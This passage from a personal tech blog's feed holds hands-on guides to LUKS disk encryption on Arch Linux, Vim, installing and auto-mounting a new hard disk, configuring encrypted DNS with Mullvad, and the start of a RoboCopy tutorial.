[Complete Guide to setting up LUKS on LVM encryption in Arch Linux (Minimal System)](/posts/linux/distribution/archlinux/archlinux-luks-encryption-fully-install-systemd)

### Step 4: Configure mkinitcpio.conf

Edit the `/etc/mkinitcpio.conf` file, ensuring that the `HOOKS` line includes `lvm2` and `sd-encrypt`. It should look like the line below; you can copy it directly.

```shell
HOOKS=(systemd autodetect microcode modconf kms keyboard keymap sd-vconsole sd-encrypt block lvm2 filesystems fsck)
```

Save the changes. Next, create `/etc/vconsole.conf`; if it is missing, `mkinitcpio` fails with the error:

`==&gt; ERROR: file not found: &apos;/etc/vconsole.conf&apos;`

```shell
echo &quot;KEYMAP=us&quot; &gt; /etc/vconsole.conf
```

And now regenerate the configuration:

```shell
mkinitcpio -P
```

### Step 5: Install and Configure GRUB

Install GRUB and efibootmgr:

```shell
pacman -S grub efibootmgr
```

Configure the GRUB file:

```shell
nvim /etc/default/grub
```

First, get the UUID of the encrypted partition using `blkid /dev/nvme0n1p2`, then edit `GRUB_CMDLINE_LINUX_DEFAULT`:

```shell
GRUB_CMDLINE_LINUX_DEFAULT=&quot;rd.luks.name=&lt;Your_M.2_UUID&gt;=crypt root=/dev/mapper/vol-root&quot;
```

and set `GRUB_ENABLE_CRYPTODISK` to `y`.

Install GRUB:

```shell
grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=GRUB --recheck
```

Generate the GRUB configuration:

```shell
grub-mkconfig -o /boot/grub/grub.cfg
```

### Step 6: Reboot and Decrypt

Reboot your system. You&apos;ll notice that GRUB prompts you to enter the passphrase or password for decryption. After successfully decrypting, you&apos;ll encounter another decryption prompt for your volume disk.

&gt;Note: The decryption process may take some time, and entering the wrong passphrase will drop you into GRUB rescue mode; reboot and try again.

### Reboot

After completing these steps, exit the chroot and unmount your new Arch system. You can then enjoy your new Arch Linux system with LUKS encryption. (But no GUI XD)

```shell
exit
umount -R /mnt
```

## References

- [Alpine Linux with Full Disk Encryption](https://battlepenguin.com/tech/alpine-linux-with-full-disk-encryption/)
- [[SOLVED] Grub with lvm on LUKS -&gt; rescue mode. Incomplete grub.cfg?](https://bbs.archlinux.org/viewtopic.php?id=246628)
- [Arch Linux | LVM on LUKS with GRUB | Encrypted Installation](https://invidious.einfachzocken.eu/watch?v=FcNQQxtPA0A)
- [Encrypted /boot](https://wiki.archlinux.org/title/GRUB#Encrypted_/boot)
- [dm-crypt/Encrypting an entire system](https://wiki.archlinux.org/title/Dm-crypt/Encrypting_an_entire_system)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Vim: Quick Guide</title><link>https://ummit.dev//posts/linux/tools/terminal/vim/vim-guide/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/vim/vim-guide/</guid><description>Comprehensive Vim editor guide covering modes, essential commands, and advanced features for efficient text editing.</description><pubDate>Thu, 21 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Vim is a powerful text editor that extends the functionality of the classic vi editor, providing an enhanced experience for text editing and coding. If you&apos;re new to Vim or looking to master its capabilities, this guide will walk you through the fundamental modes, commands, and features.

## Understanding Modes

Vim operates in different modes, each serving a specific purpose. Familiarizing yourself with these modes is essential for efficient text editing.

### Normal Mode (Esc)

Normal mode is the default mode where you navigate, manipulate text, and execute commands.

- **Navigation:**
  - `h`, `j`, `k`, `l`: Move left, down, up, and right respectively.
  - `w`, `b`: Move forward or backward by a word.
  - `0`, `$`: Move to the beginning or end of a line.

- **Manipulation:**
  - `x`: Delete the character under the cursor.
  - `dd`: Delete the current line.
  - `yy`: Copy the current line.
  - `p`: Paste after the cursor.
  - `u`: Undo the last action.
  - `Ctrl-r`: Redo.

- **Searching:**
  - `/`: Enter search mode.

### Insert Mode (i)

In insert mode, you can directly type and edit text.

- **Enter Insert Mode:**
  - `i`: Insert before the cursor.
  - `I`: Insert at the beginning of the line.
  - `a`: Insert after the cursor.
  - `A`: Insert at the end of the line.

- **Exit Insert Mode:**
  - `Esc`: Return to normal mode.

### Visual Mode (v)

Visual mode allows you to select and manipulate text.

- **Enter Visual Mode:**
  - `v`: Start character-wise visual mode.
  - `V`: Start line-wise visual mode.

- **Manipulate Selected Text:**
  - `d`: Delete the selected text.
  - `y`: Copy the selected text.
  - `c`: Change the selected text.

## Essential Commands

Learn these essential commands to streamline your Vim experience.

- `:%d`: Delete all content.
- `:%y+`: Copy all content.
- `:w`: Save changes.
- `:q`: Quit (close the current file).
- `:wq`: Save and quit.

## Advanced Features

Unlock the full potential of Vim with advanced features.

- **Multiple Windows:**
  - `:sp`: Split the window horizontally.
  - `:vsp`: Split the window vertically.
  - `Ctrl-w` + `h`, `j`, `k`, `l`: Navigate between windows.

- **File Navigation:**
  - `:e &lt;filename&gt;`: Open a file.
  - `:b &lt;buffer&gt;`: Switch between buffers.
  - `:ls`: List open buffers.

- **Search and Replace:**
  - `:s/foo/bar/g`: Replace all occurrences of &quot;foo&quot; with &quot;bar&quot; in the current line.
  - `:%s/foo/bar/g`: Replace all occurrences in the entire file.

- **Delete specific text:**
  - `:%s/foo//g`: Delete all occurrences of &quot;foo&quot; in the entire file.

- **Autocomplete with Plugins:**
  - Install plugins like [coc.nvim](https://github.com/neoclide/coc.nvim) for autocompletion.
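As a tiny illustration of `:%s/foo/bar/g`, here is a hypothetical two-line buffer before and after the substitution:

```
Before:          After:
foo one foo      bar one bar
two foo          two bar
```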

## Conclusion

As a Linux user, mastering a terminal-based text editor is essential. If you&apos;ve become adept at Vim, you&apos;re a true Vim hacker—whether it&apos;s Vi, Vim, or Neovim! :D

In terms of skills, not many people have mastered Linux, let alone Vim. Although there are text editors like Nano, they lack the robust features of Vim or Neovim, making them less powerful options.

Take Windows Notepad and Notepad++: Notepad serves as the default text editor on Windows, but it&apos;s essentially a basic editor, lacking the comprehensive features needed to function like an integrated development environment (IDE).

So, I highly recommend learning Vi, Vim, Neovim, or Emacs as your daily file editor. Once you master them, you&apos;ll experience a significant change. Your computer skills will level up considerably.

Leave GUI programs aside and delve into terminal-based tools to elevate your computer skills and become proficient in the art of terminal hacking.

## Reference

- [Find and Replace Text in Vim](https://linuxhandbook.com/find-replace-vim/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Encrypt and Decrypt Your Internal Disk with an Existing Decrypted Filesystem Inside Keyfile</title><link>https://ummit.dev//posts/linux/system/harddisk/encrypt-and-decrypt-your-internal-disk-with-an-existing-decrypted-filesystem-inside-keyfile/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/system/harddisk/encrypt-and-decrypt-your-internal-disk-with-an-existing-decrypted-filesystem-inside-keyfile/</guid><description>Set up automatic disk encryption and decryption using LUKS with keyfile-based authentication on Linux.</description><pubDate>Fri, 08 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the previous article, I demonstrated how to auto-mount an internal disk during system boot-up. In this article, I&apos;ll guide you through the process of encrypting your internal disk using LUKS.

This method involves decrypting your first disk, locating the keyfile on that disk, and using it to decrypt subsequent disks. Thus, you&apos;ll need to decrypt the first disk to decrypt your internal disk. This ensures that the keyfile is stored on your first disk, preventing them from being separated.

In summary, this method uses both a passphrase and a keyfile for disk decryption. The keyfile is stored on your system.

### Compatibility

Before proceeding, ensure you&apos;ve backed up all data on your internal disk, as the upcoming command will overwrite all data. Also, verify compatibility:

- The target disk is already fully encrypted.
- You want to encrypt an internal disk.

### What It Does

- Encrypts by passphrase and keyfile.
- Requires both passphrase and keyfile for decryption.
- Allows decryption using the keyfile.

## Step 1: Switch to Root User

Since all operations require root permissions, switch to the root user to expedite the process.

```shell
su
```

## Step 2: Identify Your Disk

To check which disk you&apos;re targeting for encryption, enter the following command:

```shell
lsblk
```

## Step 3: Create File System

Linux disks need a partition table; we&apos;ll use GPT here. Use `gdisk` to create the GPT table and a partition. After identifying the target disk, run `gdisk` on it and enter the following keystrokes:

```shell
gdisk /dev/sda
o        # create a new empty GPT
y        # confirm
n        # add a new partition
&lt;Enter&gt;  # accept the default partition number
&lt;Enter&gt;  # accept the default first sector
&lt;Enter&gt;  # accept the default last sector
&lt;Enter&gt;  # accept the default type (8300, Linux filesystem)
p        # print the table to verify it is correct
w        # write changes to disk
y        # confirm
```

After this process, a new partition will exist at `/dev/sda1`.

## Step 4: CryptLUKS Setup

Now, let&apos;s encrypt the disk using `cryptsetup`:

```shell
cryptsetup luksFormat --type luks2 --cipher aes-xts-plain64 --hash sha256 --iter-time 10000 --key-size 256 --pbkdf argon2id --use-urandom --verify-passphrase /dev/sda1

YES
```

## Step 5: Decrypt LUKS

This command will encrypt the disk and map it to a name, such as `4tbhdd`.

```shell
cryptsetup open /dev/sda1 4tbhdd
```

When you unlock a LUKS device with `cryptsetup open` (or `luksOpen`), the name of the mapped device under `/dev/mapper/` is simply the name you pass to the command, and it can be changed as needed.

## Step 6: Create File System

As we have created a new mapper for the encrypted disk (`4tbhdd`), we also need to create a file system on this mapper. Execute the following command to accomplish this:

```shell
mkfs.btrfs /dev/mapper/4tbhdd
```

This command initializes a Btrfs file system on the specified mapper, ensuring that the encrypted disk is ready for use.

## Step 7: Create Keyfile

Now, create a keyfile that will be imported into your previously decrypted disk, enhancing the security of your setup.

```shell
dd if=/dev/urandom of=/root/keyfile bs=10000 count=819 # ~8.19 MB of random data; LUKS reads keyfiles up to 8 MiB
```

## Step 8: Set the Permission of Keyfile

Set the permissions for the keyfile to ensure only the root user can access it, enhancing security.

```shell
chmod 0400 /root/keyfile
```

## Step 9: Add Keyfile to LUKS Device

Add the keyfile to the LUKS device to reinforce security and enable decryption.

```shell
cryptsetup luksAddKey /dev/sda1 /root/keyfile
```
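You can verify that the keyfile landed in a second keyslot with a read-only dump of the LUKS header:

```shell
cryptsetup luksDump /dev/sda1 # look for two populated keyslots (passphrase + keyfile)
```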

## Step 10: Get the UUID of LUKS

Retrieve the UUID of the LUKS device for the next steps by running the following command:

```shell
cryptsetup luksUUID /dev/sda1
```

## Step 11: Add to crypttab

Add the UUID and related content to the `crypttab`. This file is crucial for loading the key during the system boot-up without requiring a passphrase.

```shell
nvim /etc/crypttab

4tbhdd          /dev/disk/by-uuid/&lt;uuid-of-luks&gt;  /root/keyfile   luks
```

This `crypttab` entry automates unlocking and mapping the LUKS-encrypted device during boot. It specifies the necessary details: the device path, the keyfile, and the desired mapping name (`4tbhdd`). This way, you don&apos;t need to manually run the `cryptsetup luksOpen` command during each boot.

Here&apos;s the breakdown:

- The system reads the `/etc/crypttab` file during the boot process.
- It identifies the `4tbhdd` entry.
- It automatically runs a command similar to this:

```bash
cryptsetup luksOpen /dev/disk/by-uuid/&lt;UUID&gt; 4tbhdd --key-file /root/keyfile
```

- The LUKS-encrypted device is then mapped to `/dev/mapper/4tbhdd`, and you can access it using this mapped device name.

This automation is convenient for managing encrypted devices, especially when dealing with multiple LUKS-encrypted partitions or disks. It simplifies the process of unlocking and mapping during system startup.

## Step 12: Get the UUID of mapper

Append the `blkid` output for the mapper to `/etc/fstab`, so you can edit it into a proper mount entry in the next step:

```shell
blkid /dev/mapper/4tbhdd &gt;&gt; /etc/fstab
```

## Step 13: Add to fstab

Edit the `/etc/fstab` file and add an entry for mounting the mapper during system boot-up:

```shell
nvim /etc/fstab

# /dev/mapper/4tbhdd 4TB HDD
UUID=&lt;UUID-of-mapper&gt;  /mnt/4tbhdd     btrfs       defaults        0 0
```

Explanation:

- The `blkid` command is used to retrieve the UUID of the mapper (`4tbhdd`).
- The obtained UUID is then appended to the `/etc/fstab` file, ensuring that the mapper is mounted automatically during the system boot-up.

## Step 14: Create Mounting Point

Since we are targeting the mount point `/mnt/4tbhdd`, let&apos;s create this directory using the following command:

```shell
mkdir /mnt/4tbhdd
```

This directory will serve as the mount point for our encrypted internal disk.

## Step 15: Adjusting Permissions

Because the mount point is owned by root, use `chown` so a regular user can read and write it. Replace `user:group` with your own username and group.

```shell
chown user:group /mnt/4tbhdd/
```

## Step 16: Reboot

Now, reboot your system. After the reboot, you should notice that you are not required to enter any passphrase manually. Use the `lsblk` command to verify that your encrypted internal disk has been successfully mounted:

```shell
lsblk
NAME           MAJ:MIN RM   SIZE RO TYPE  MOUNTPOINTS
sda              8:0    0   3.6T  0 disk
└─sda1           8:1    0   3.6T  0 part
  └─4tbhdd     254:4    0   3.6T  0 crypt /mnt/4tbhdd
```

Your internal disk, named `4tbhdd`, is now mounted at `/mnt/4tbhdd` and is automatically decrypted during the boot process.

## Step 17: Double Verify Status

To double-check the status of the encrypted device, you can use the `cryptsetup status` command. This will provide detailed information about the LUKS device:

```shell
cryptsetup status /dev/mapper/4tbhdd
```

The output should confirm that `/dev/mapper/4tbhdd` is active, and it is in read/write mode.

## Conclusion

Congratulations! You&apos;ve successfully encrypted and set up an internal disk for decryption using a keyfile alongside a passphrase. This adds an extra layer of security to your storage solution. Remember to store your keyfile securely and keep it accessible to ensure smooth disk decryption.

## References

- [How to encrypt a drive and mount it automatically at boot / no prompt](https://onion.tube/watch?v=UXJrSji-nNo)
- [How to automatically mount an encrypted volume at boot?](https://discussion.fedoraproject.org/t/how-to-automatically-mount-an-encrypted-volume-at-boot/71271/1)
- [How to add a passphrase, key, or keyfile to an existing LUKS device](https://access.redhat.com/solutions/230993)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Upgrading My Computer with a New HDD!</title><link>https://ummit.dev//posts/hardware/harddisk/upgrading-my-computer-with-a-new-hdd-a-beginners-guide/</link><guid isPermaLink="true">https://ummit.dev//posts/hardware/harddisk/upgrading-my-computer-with-a-new-hdd-a-beginners-guide/</guid><description>Beginner-friendly guide to physically installing and setting up a new hard disk drive in your computer.</description><pubDate>Thu, 07 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

I recently decided to upgrade my computer by adding a new HDD. This was a significant step for me, as I hadn&apos;t worked much with hardware before and had never installed an HDD myself.

&gt;Toshiba Enterprise Series MG08ADA400N, 4TB, 7200 rpm, 256 MB cache, 3.5&quot;

![New HDD](./featured.webp)

## Why Upgrade?

Initially, I hesitated due to concerns about storage space, but with the increasing number of virtual machines on my computer, especially after the GPU passthrough, I finally decided to invest in a new HDD. Today, I purchased a 4TB HDD, and I&apos;m excited to share my experience of installing hardware for the first time.

## How to Install the HDD: A Beginner&apos;s Guide

Having watched several YouTube videos that weren&apos;t beginner-friendly, I sought advice from the online community. The entire process took around 5 hours, and I learned valuable lessons on how to install an HDD.

### Step 1: Get Ready

Remove the left and right side panels from the computer case. Identify the HDD bay in the case, the SATA ports on the motherboard, and the ports on the power supply unit.

![Port](https://pcguide101.com/wp-content/uploads/2021/07/hard-drive-ports-connections.jpeg)

![HDD Port](https://images.easytechjunkie.com/sata-cable-connected-to-a-drive.jpg)

### Step 2: Find the Cables

You&apos;ll need two cables for the installation—usually found in the motherboard and power supply boxes.

#### Power Supply Unit Cable

This cable supplies power to the HDD.

![PSU](https://ae01.alicdn.com/kf/HLB1JJ26XvLsK1Rjy0Fbq6xSEXXaX/PCIe-6Pin-Male-to-2-3-4-SATA-Power-Supply-Cable-for-Seasonic-Focus-Plus-Platinum.jpg)

#### SATA Cable

This cable is for data transfer.

![SATA Cable](https://pactech-inc.com/wp-content/uploads/2014/06/SATA2K-XXL-Amphenol-SATA-Cable-Straight-with-Latch-to-Left-Angle-003.jpg)

### Step 3: Plug in the Cables

Ensure the power supply unit and SATA cables are plugged in correctly. Connect the power supply unit cable to the corresponding port on your PSU, and connect the SATA cable to one of the SATA 3-5 ports on the motherboard.

![SATA-Destination](https://pcguide101.com/wp-content/uploads/2021/06/SATA-2-700x525.jpeg)

![PSU-Destination](https://pbs-prod.linustechtips.com/monthly_2021_08/1117139249_Corsairpsu.png.45d19ada31b0572c874aebba2a36f041.png)

### Step 4: Test the HDD

Reconnect all cables (PSU, HDMI, USB, keyboard, etc.), turn on your computer, and check if the HDD is correctly displayed using the `lsblk` command in the terminal.

```shell
❯ lsblk
NAME           MAJ:MIN RM   SIZE RO TYPE  MOUNTPOINTS
sda              8:0    0   3.6T  0 disk &lt;- This is my new HDD
```

### Step 5: Secure the HDD

Ensure the HDD is correctly placed in the rack inside the computer case. Lock the HDD rack securely.

## Conclusion

This beginner&apos;s guide aims to simplify the process of installing an HDD for those, like me, who are new to hardware upgrades. With your new HDD successfully installed, you&apos;ll have expanded storage and improved capabilities for your computer.

## Reference

- [What Does a SATA Port Look Like?](https://pcguide101.com/motherboard/what-does-a-sata-port-look-like/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Mounting Your Internal Disk on your Linux System</title><link>https://ummit.dev//posts/linux/system/harddisk/mounting-your-internal-disk-on-your-linux-system/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/system/harddisk/mounting-your-internal-disk-on-your-linux-system/</guid><description>Configure automatic mounting of internal hard drives on Linux using fstab and proper filesystem setup.</description><pubDate>Thu, 07 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the previous article, I showed you how to physically install a hard disk in your computer. Now, in this article, I&apos;ll guide you through the process of automounting the hard disk on your Linux system, making it accessible and ready to use with just a few simple commands.

## Step 1: Switch to Root User

Since the operations require root permissions, switch to the root user without using `sudo`:

```shell
su
```

## Step 2: Create GPT Table and File System

Modern Linux systems typically use a GPT partition table, especially for disks larger than 2 TB. Use `gdisk` to create the table and a partition. First, identify your disk name with `lsblk` or `blkid`.

```shell
gdisk /dev/sda
# at the gdisk prompts:
o    # create a new, empty GPT partition table
y    # confirm
n    # add a new partition
     # press Enter four times to accept the default partition number,
     # first sector, last sector, and type code
p    # print the partition table to verify it is correct
w    # write the changes to disk
y    # confirm
```

## Step 3: Format the Disk and Choose File System Type

I prefer Btrfs for my disk type. Type:

```shell
mkfs.btrfs /dev/sda1
```

If you encounter an error indicating existing data, use the `-f` option to force formatting of `/dev/sda1`:

```shell
mkfs.btrfs -f /dev/sda1
```

## Step 4: Create Your Mount Source Path

Choose a directory to serve as the mount point for your files. Mounting under `/mnt/` is the common convention.

```shell
mkdir /mnt/4tbhdd
```

## Step 5: Mounting the Disk

Mounting the disk can be done temporarily or set up for automount.

### Temporarily

For a temporary mount (it lasts until the next shutdown or reboot):

```shell
mount -t btrfs /dev/sda1 /mnt/4tbhdd/
```

### Auto-mount

1. Identify your file system UUID using `blkid`.

```shell
blkid /dev/sda1
```

2. Copy the UUID value and use your preferred text editor to add the following line to `/etc/fstab`:

```shell
❯ nvim /etc/fstab

UUID=&lt;uuid-of-btrfs-file-system&gt;   /mnt/4tbhdd   btrfs   defaults  0   2
```

Explanation of the fields:

- `UUID=&lt;uuid-of-btrfs-file-system&gt;`: Replace this with the actual UUID of your Btrfs file system.

- `/mnt/4tbhdd`: This is the mount point where the Btrfs file system will be mounted. Ensure that the mount point exists before attempting to mount.

- `btrfs`: Specifies the file system type. In this case, it&apos;s Btrfs.

- `defaults`: This field includes default mount options. You can customize this field based on your specific needs, but `defaults` typically includes commonly used options.

- `0`: This field is used by `dump` to decide whether the file system should be backed up. A value of `0` means it is skipped by `dump`.

- `2`: This field is used by `fsck` to determine the order in which file system checks are done at boot time. The root file system should be `1`, other file systems `2`, and `0` disables checking.

After adding this entry to your `/etc/fstab` file, you can either reboot your system to apply the changes or manually mount the file system using the `mount -a` command.
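
Before rebooting, it is worth sanity-checking the new line. As a minimal sketch (with a placeholder standing in for your real UUID), a well-formed fstab entry should split into exactly six whitespace-separated fields:

```shell
# Sketch: an fstab entry has exactly six fields
# 0000-PLACEHOLDER stands in for the real UUID
set -- UUID=0000-PLACEHOLDER /mnt/4tbhdd btrfs defaults 0 2
echo fields: $#
```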

### Verify the Mounting

A simple way to verify: open the `/mnt/4tbhdd` directory in your file manager, and you should see that your hard disk has been mounted. Right-click the directory and check the free space (`4.0 TB Free`).

![done](./done.png)

## Step 6: Adjusting Permissions

After successfully auto-mounting the disk, you might notice that the ownership is restricted to the root user. This means you cannot use a regular user to create directories or manipulate files on the mounted disk. To address this, use the `chown` command to set permissions, allowing your user and group to access all items:

```shell
sudo chown user:group /mnt/4tbhdd
```

Replace `user` and `group` with your actual username and group. This adjustment ensures that you, as a regular user, have the necessary permissions to interact with the mounted disk.

## Conclusion

Automounting your hard disk on Linux ensures convenient access to your storage space without manual intervention. This process allows you to seamlessly integrate additional storage capacity into your system.

## References

- [How to mount disk and partition in Linux](https://www.simplified.guide/linux/disk-mount)
- [How To Automount File Systems on Linux](https://www.linuxbabe.com/desktop-linux/how-to-automount-file-systems-on-linux)
- [mount: wrong fs type, bad option, bad superblock](https://unix.stackexchange.com/questions/315063/mount-wrong-fs-type-bad-option-bad-superblock)
- [How to Mount a Hard Drive in Linux on Startup](https://onion.tube/watch?v=JS0Jd_DNXdg)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Configuring DNS Over HTTPS (DoH) on your system</title><link>https://ummit.dev//posts/infosec/doh-enable-any-system/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/doh-enable-any-system/</guid><description>This step-by-step guide ensures encrypted DNS traffic with DoH</description><pubDate>Mon, 27 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Securing your DNS (Domain Name System) queries is an essential step in enhancing your online privacy. DNS Over HTTPS (DoH) encrypts your DNS traffic, preventing potential eavesdropping and manipulation. This guide walks you through configuring DoH on any system, such as Linux, Windows, and Android.

A simpler explanation is shown in the following diagram:

![DoH](./featured.webp)

## Browser DNS Over HTTPS?

Firefox-based and Chromium-based browsers also have an option called &quot;DNS Over HTTPS&quot;, but this guide configures DoH globally, so there is no need to enable the browser option: all DNS queries on the system, not just the browser&apos;s, go through the encrypted resolver.

### DNS Over HTTPS Provider

First of all, you need to choose a DNS Over HTTPS (DoH) provider; I recommend [Mullvad DoH](https://mullvad.net/en/help/dns-over-https-and-dns-over-tls). If you prefer another provider, such as IVPN, AdGuard, Google, Cloudflare, or NextDNS, the steps are the same; only the hostname and IP differ.

### Mullvad DoH: Which One Is Good for You?

It depends on your needs. In my case I use `base`; honestly, I want to watch porn, and when I tested `all` I couldn&apos;t access most porn sites. If you don&apos;t need that, use `all`.

If you only need plain DoH functionality without any blocking, just use `dns`:
&gt;dns.mullvad.net

| Hostname                   | IPV4          | Ads   | Trackers   | Malware   | Adult   | Gambling   | Social media   |
|--------------------------  |-------------  |-----  |----------  |---------  |-------  |----------  |--------------  |
| dns.mullvad.net            | 194.242.2.2   |       |            |           |         |            |                |
| adblock.dns.mullvad.net    | 194.242.2.3   | ✅     | ✅          |           |         |            |                |
| base.dns.mullvad.net       | 194.242.2.4   | ✅     | ✅          | ✅         |         |            |                |
| extended.dns.mullvad.net   | 194.242.2.5   | ✅     | ✅          | ✅         |         |            | ✅              |
| all.dns.mullvad.net        | 194.242.2.9   | ✅     | ✅          | ✅         | ✅       | ✅          | ✅              |

For the github repository see:

{{&lt; github repo=&quot;mullvad/dns-blocklists&quot; &gt;}}

## Step-by-Step Guide on Linux (systemd)

{{&lt; alert &gt;}}
These steps only work on Linux systems that use the systemd init system, such as Arch Linux. Note that systemd-resolved encrypts DNS with DNS over TLS (DoT) rather than DoH; both protect your queries in transit.
{{&lt; /alert &gt;}}

1. **Enable and start systemd-resolved:**

   Open a terminal and make sure that systemd-resolved is enabled and started:
   ```bash
   sudo systemctl enable systemd-resolved
   sudo systemctl start systemd-resolved
   ```

2. **Edit systemd-resolved Configuration:**

   Edit the systemd-resolved configuration file with your preferred text editor:
   ```bash
   sudo nano /etc/systemd/resolved.conf
   ```

3. **Add DoH Servers:**

   In the opened file, add the following lines at the bottom, under the `[Resolve]` section, replacing the IP with your preferred DNS server option:
   ```ini
   DNS=194.242.2.4 #base.dns.mullvad.net
   DNSSEC=yes
   DNSOverTLS=yes
   Domains=~.
   ```

   &gt;Note: If you are currently using a VPN on your system, do not set `DNSOverTLS` to `yes`; set it to `opportunistic` instead. If it is set to `yes`, you won&apos;t be able to use the network.

   &gt;Note: Enabling DNSSEC is optional, but it may cause issues with websites having incorrect DNSSEC information.

4. **Save and Exit:**

   Save the file by pressing `Ctrl + O` and then `Enter`, and then exit with `Ctrl + X`.

5. **Create Symbolic Link:**

   Create a symbolic link to the file using the following command in the Terminal:
   ```bash
   sudo ln -sf /run/systemd/resolve/stub-resolv.conf /etc/resolv.conf
   ```

6. **Restart systemd-resolved:**

   Restart systemd-resolved to apply the changes:
   ```bash
   sudo systemctl restart systemd-resolved
   ```

7. **Restart NetworkManager:**

   Restart NetworkManager for the changes to take effect:
   ```bash
   sudo systemctl restart NetworkManager
   ```

8. **Restart dhcpcd:**

    Restart dhcpcd to make sure the changes take effect (skip this step if your system does not use dhcpcd):
    ```shell
    sudo systemctl restart dhcpcd
    ```

9. **Verify DNS Settings:**

   Verify the DNS settings with:
   ```bash
   resolvectl status
   ```

   The `Current DNS Server:` line should show the IP address you configured.

10. **Test ping response:**

    If your setup is fine, try pinging any website and you should get a response.
    ```shell
    ping gentoo.org
    ```

11. **Test Mullvad DoH works well:**

    For Mullvad, refer to the [official Mullvad website](https://mullvad.net/en/check) to perform a check. Otherwise, use this command:
    ```shell
    resolvectl query gentoo.org
    ```

    The output should include:

    ```shell
    Data was acquired via local or encrypted transport: yes
    ```

## Step-by-step instructions on Windows

On Windows, you do not need to use the command line to complete the process. Windows already has a GUI for this process.

1. **Accessing Settings:**
Open the Settings menu on your Windows system.
   ![Settings](./win11/Setting open.png)

2. **Navigating to Network &amp; Internet Settings:**
In the Settings menu, locate and click on `Network &amp; Internet.`
     ![Network &amp; Internet](./win11/Setting-network.png)

3. **Selecting Your Network:**
Under `Network &amp; Internet`, choose your preferred network, typically labeled as Ethernet for wired connections.
     ![Ethernet](./win11/Ethernet.png)

4. **Editing DNS Settings:**
Click on the `Edit` option for IP settings, specifically focusing on the IPv4 DNS Server.
     ![Edit](./win11/Edit-all.png)

5. **Switching to Manual DNS Configuration:**
Change the DNS configuration from `Automatic` to `Manual.`
     ![Manual](./win11/Manual.png)

6. **Setting Preferred DNS:**
Update the &quot;Preferred DNS&quot; section with your chosen DNS address. For Windows, use one of the following Mullvad DoH addresses:
     - 194.242.2.2 - [dns.mullvad.net/dns-query](https://dns.mullvad.net/dns-query)
     - 194.242.2.3 - [adblock.dns.mullvad.net/dns-query](https://adblock.dns.mullvad.net/dns-query)
     - 194.242.2.4 - [base.dns.mullvad.net/dns-query](https://base.dns.mullvad.net/dns-query)
     - 194.242.2.5 - [extended.dns.mullvad.net/dns-query](https://extended.dns.mullvad.net/dns-query)
     - 194.242.2.9 - [all.dns.mullvad.net/dns-query](https://all.dns.mullvad.net/dns-query)

7. **Activating DNS Over HTTPS:**
Enable the DNS over HTTPS option.

8. **Saving Changes and Adding Alternate DNS:**
Save your changes. Optionally, you can add an `Alternate DNS` using a different address for redundancy.
     ![edit-all](./win11/example.png)

9. **Confirming Encryption:**
After editing, ensure that the &quot;IPv4 DNS Server&quot; displays as `encrypted.`
     ![done](./win11/Done.png)

10. **Verification:**
Check the DNS status on [Mullvad DNS](https://mullvad.net/en/check) to confirm that your DNS queries are not leaking.

## Step-by-step guide for Android

Android is even easier: the setting is built into the system UI. (Android&apos;s Private DNS feature uses DNS over TLS.)

1. Start `Settings` and click on `Connections`:

![Settings](./android/Settings.png)

2. In `Connections` click on `More Connection Settings`.

![More Connection Settings](./android/More Connection Settings.png)

3. Click `Private DNS`, default is `Automatic`.

![Private DNS](./android/Private DNS.png)

4. Enter your preferred hostname. In this case I will use `base.dns.mullvad.net`.

![Enter hostname](./android/Enter host name.png)

## Conclusion

By following these steps, you&apos;ve configured DNS Over HTTPS using systemd-resolved on your system, enhancing your privacy and securing your DNS queries. If you encounter issues, try the opportunistic DoH setting or experiment with different DNS server options.

## References

- [DNS over HTTPS and DNS over TLS](https://mullvad.net/en/help/dns-over-https-and-dns-over-tls)
- [What Is DNS-Over-HTTPS And How To Enable It On Your Device (Or Browser)](https://www.itechtics.com/dns-over-https/)
- [DNS over TLS with systemd-resolved](https://askubuntu.com/questions/1092498/dns-over-tls-with-systemd-resolved)
- [Guide on how to enable dot (dns over tls) on systemd-resolved.](https://www.reddit.com/r/linux/comments/us0h00/guide_on_how_to_enable_dot_dns_over_tls_on/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>File Management with RoboCopy</title><link>https://ummit.dev//posts/windows/terminal/robocopy/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/terminal/robocopy/</guid><description>Master Windows RoboCopy for efficient multi-threaded file copying, moving, and backup operations with advanced filtering.</description><pubDate>Sat, 18 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

RoboCopy, short for Robust File Copy, is a powerful multi-threaded file management tool in Windows. Its efficiency makes it several times faster than traditional copy-paste methods.

## Why RoboCopy?

Managing a large number of files often requires organization, classification, and backups. However, dealing with unnecessary files during backups can be time-consuming. This is where RoboCopy comes to the rescue, providing a swift and efficient solution.

## Command Structure

### Format
```bat
robocopy &lt;source_location&gt; &lt;destination_location&gt; [&lt;file_filter&gt;] [&lt;options&gt;]
```

### Basic Demonstration

The following basic demonstration copies all PNG files from the &quot;Server&quot; location to &quot;Server assets/yoyo&quot;:

```bat
robocopy Server &quot;Server assets/yoyo&quot; *.png
```

### Demonstration with Arguments

Here, we use additional arguments for more advanced behavior: `/PURGE` deletes destination files that no longer exist in the source, and `/S` copies subfolders:

```bat
robocopy Server &quot;Server assets/yoyo&quot; *.png /PURGE /S
```

### Copying Across Disks

This example illustrates copying HTML files from folder1 on drive D to folder2 on drive E:

```bat
robocopy d:\folder1 e:\folder2 *.html
```

## Practical Parameters

### Folder Parameters

- `/XD`: Exclude directories
- `/PURGE`: Delete destination files and directories that no longer exist in the source
- `/S`: Copy subdirectories, excluding empty ones
